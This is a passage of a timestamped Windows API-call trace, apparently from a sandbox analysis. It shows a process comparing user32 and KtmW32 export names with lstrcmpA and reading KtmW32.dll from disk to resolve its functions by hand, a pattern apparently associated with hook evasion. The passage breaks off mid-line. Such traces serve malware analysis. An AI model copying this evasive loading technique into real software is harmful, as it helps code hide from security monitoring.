[0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0213.728] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0213.729] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0213.729] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0213.729] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0213.729] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0216.007] GetProcessHeap () returned 0x4a0000 [0216.374] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4113040 | out: hHeap=0x4a0000) returned 1 [0216.382] GetProcessHeap () returned 0x4a0000 [0216.382] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9140 [0216.383] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0216.388] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0216.388] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0216.388] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0216.388] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0216.388] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0216.388] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0216.389] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0216.389] GetProcessHeap () returned 0x4a0000 [0216.389] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x5e00) returned 0x2d55030 [0216.478] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0216.478] ReadFile (in: hFile=0x17c, lpBuffer=0x2d55030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d55030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0216.480] CloseHandle (hObject=0x17c) returned 1 [0216.480] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0216.480] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0216.480] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0216.481] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0216.481] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0216.481] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0216.481] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0216.481] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0216.481] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0216.481] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0216.481] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0216.481] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0216.481] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0216.481] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0216.481] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0216.481] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0216.481] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0216.481] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0216.481] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0216.481] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0216.481] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0216.481] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0216.481] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0216.482] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0216.482] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0216.482] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0216.482] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0216.482] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0216.482] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0216.482] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0216.482] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0216.482] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0216.482] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0216.482] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0216.482] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0216.482] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0216.482] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0216.482] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0216.482] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0216.482] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0216.482] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0216.482] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0216.482] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0216.482] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0216.482] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0216.483] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0216.483] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0216.483] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0216.483] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0216.483] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0216.484] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0216.485] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0216.485] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0216.485] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0216.485] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0216.485] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0216.486] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0216.486] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0216.487] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0216.487] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0216.487] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0216.487] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0216.487] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0216.487] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0216.487] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0216.487] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0216.487] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0216.487] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0216.487] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0216.487] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0216.487] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0216.487] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0216.487] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0216.487] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0216.487] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0216.487] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0216.487] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0216.488] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0216.488] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0216.488] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0216.488] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0216.488] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0216.488] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0216.488] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0216.488] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0216.488] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0216.488] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0216.488] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0216.488] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0216.488] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0216.488] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0216.488] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0216.488] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0216.488] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0216.488] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0216.488] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0216.488] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0216.489] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0216.489] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0216.490] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0216.490] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0216.491] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0216.491] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0216.491] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0216.491] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0216.491] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0216.491] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0216.491] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0216.491] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0216.491] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0216.491] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0216.491] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0216.491] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0216.491] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0216.491] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0216.491] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0216.491] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0216.491] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0216.491] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0216.491] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0216.491] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0216.491] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0216.491] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0216.492] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0216.492] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0216.492] lstrcmpA (lpString1="PrePrepareComplete", 